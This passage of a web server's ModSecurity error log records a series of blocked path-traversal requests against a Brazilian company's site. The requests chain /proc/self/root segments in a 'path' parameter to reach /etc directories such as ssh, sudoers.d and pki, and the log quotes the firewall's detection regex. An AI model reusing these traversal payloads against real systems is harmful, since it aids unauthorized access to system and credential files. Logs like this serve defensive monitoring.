"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TPda6ubjKNq_cu4bAWAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:28:32.283905 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.243.128:58064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TQLninkcc-iUj5ApMSwAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:35.543428 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:46394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TQ9a6ubjKNq_cu4bAZQAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:38.075093 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.241.31:46408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TRhCii7xarUs8iHZWJgAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:40.415112 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.241.31:43632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TSDJ3M9BSuKP7CAYFKwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:41.707093 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.241.31:43646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TSfqxLDW4GITHUkTS4wAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:43.061506 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.241.31:43656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TS_qxLDW4GITHUkTS6QAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:44.046625 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.243.128:58066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TTPHIg5MgXLBnicPnUQAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:28:44.221920 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:43666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TTPqxLDW4GITHUkTS7AAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:45.407357 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:43680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TTTJ3M9BSuKP7CAYFLwAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:46.759975 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.241.31:43692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TTrninkcc-iUj5ApMUAAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:47.923900 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:43180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TT_XLqtnMIWvjpaKH4gAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:49.217950 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.241.31:43182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TUbninkcc-iUj5ApMUQAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:49.720955 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:40536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TUV1pVZ5mVmJwsFMdpAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:28:54.055699 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.241.31:43192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TVl1pVZ5mVmJwsFMdrwAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:55.333514 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.241.31:43194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TV7ninkcc-iUj5ApMWwAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:56.488642 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:43208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TWPXLqtnMIWvjpaKH6gAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:57.887071 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.241.31:39662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TWbninkcc-iUj5ApMYgAAA4Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:59.062803 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.241.31:39672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TW7ninkcc-iUj5ApMZQAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:02.331050 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:39684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TXta6ubjKNq_cu4bAeAAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:03.683017 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.241.31:39694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TX_XLqtnMIWvjpaKH7QAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:05.066994 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.241.31:39698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TYfqxLDW4GITHUkTS8AAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
